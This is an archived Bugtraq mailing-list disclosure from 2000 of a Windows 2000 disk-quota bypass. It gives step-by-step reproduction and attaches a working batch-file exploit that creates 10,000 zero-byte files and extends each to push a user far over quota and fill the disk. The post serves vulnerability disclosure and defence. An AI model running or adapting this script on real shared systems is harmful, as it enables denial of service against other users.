'Disk (over)quota in Windows 2000'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Disk (over)quota in Windows 2000
From:       Dave Tarbatt - ACS <D.A.Tarbatt () BOLTON ! AC ! UK>
Date:       2000-02-28 14:00:04
[Download RAW message or body]

I've been looking into disk quotas under Windows 2000 and have uncovered a
few anomalies. On top of a few peculiarities there appears to be a bug which
allows a user to exceed their disk quota by as much as they wish.

*** The problem:
Tested with Windows 2000 Professional build 2195 (release version). Existing
files can be extended even if a user is over quota. If exploited by a
malicious user then at best it is a nuisance at worst it may act as a DoS if
the disk if filled.

*** Description:
After playing around with the newly introduced disk quotas in Windows 2000 I
soon uncovered a bug which would allow an ordinary, unprivileged user to
exceed their allocated disk quota and fill a disk/partition. Under normal
circumstances when a user is under quota I discovered by experiment that new
files can be created upto a size of (Quota - UsedSpace  + 2KB - 1byte), i.e.
they can go overquota by up to 2047 bytes. Not too much of a problem.
Extending existing files can be up to (Quota - UsedSpace +1KB -1byte) i.e. up
to 1023 bytes overquota - nothing much to be worried about.

However, if you are overquota new file creation is only possible upto 728
bytes if (UsedSpace < Quota+1KB), i.e. you havn't gone more than 1KB
overquota. Exisiting files can be extended by up to 736 bytes up until
(UsedSpace >= Quota+1KB). Using this point alone, I created a lot of files
with "echo.>file0000" at 2 bytes each to use up the user allocated diskquota
and extended them up to the 736 byte limit per file - I was now way over
quota.

The limit of how far over quota I could go depended on my initial quota and
how many tiny files I could create up until I hit the quota then extending
them all. Then I thought "What if I create 0 byte files?".

Oh dear! If you are under quota you can create as many 0 byte files as you
wish. They count towards nothing. Then extend these files by 736 bytes and
your disk starts filling up and up and up...

*** To recreate (typical example):
Create an ordinary unprivileged user and give them a diskquota of, say, 1MB.
Open a command prompt and using whatever means you wish, create a lot of 0
byte files (e.g. SHIFT>FILE0000). Then append/extend those files by up to 736
bytes (e.g. ECHO 736-characters-here>>FILE0000). If you try and extend beyond
736 bytes the file and it's contents get chopped off at 674 bytes so for
speed disk filling with fewer files don't try and go beyond 736 bytes.

See attachment for a batch file to create 10,000 of 0 byte files then extend
them all to 736 bytes.

*** Workaround/fix:
None known. However, to prevent DoS on servers you should not permit people
to write to the same partiton that the operating system resides on.

Dave,

http://redirect.to/null/
PGP fingerprint: AE23 A19C 3E5E 74F4 2193  4BB3 E154 54AF


The following section of this message contains a file attachment
prepared for transmission using the Internet MIME message format.
If you are using Pegasus Mail, or any another MIME-compliant system,
you should be able to save it or view it from within your mailer.
If you cannot, please ask your system administrator for assistance.

   ---- File information -----------
     File:  OverQuota.BAT
     Date:  25 Feb 2000, 22:03
     Size:  1008 bytes.
     Type:  Text

["OverQuota.BAT" (Application/Octet-stream)]

@echo off
echo Windows 2000 disk (over)quota exploit
echo Dave Tarbatt 26/02/2000 http://redirect.to/null/
rem
rem Create 10,000 zero byte files ('REM>filename' used to work but not any more)
echo Creating 10,000 zero byte files...
for %%i in (0 1 2 3 4 5 6 7 8 9) do for %%j in (0 1 2 3 4 5 6 7 8 9) do for %%k in (0 \
1 2 3 4 5 6 7 8 9) do for %%l in (0 1 2 3 4 5 6 7 8 9) do shift>FILE%%i%%j%%k%%l rem
rem Create a 736 byte file (the largest extent that works)
echo Creating 736 byte file...
shift>736.txt
for %%i in (0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22) do for %%j in \
(0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15) do echo.>>736.txt rem
rem Appending the 736 byte file to all the empty ones (extend them)
echo Appending 736 bytes to all 10,000 files...
for %%i in (0 1 2 3 4 5 6 7 8 9) do for %%j in (0 1 2 3 4 5 6 7 8 9) do for %%k in (0 \
1 2 3 4 5 6 7 8 9) do for %%l in (0 1 2 3 4 5 6 7 8 9) do type \
736.txt>>FILE%%i%%j%%k%%l rem
echo.
echo Done. Massively over quota!



[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic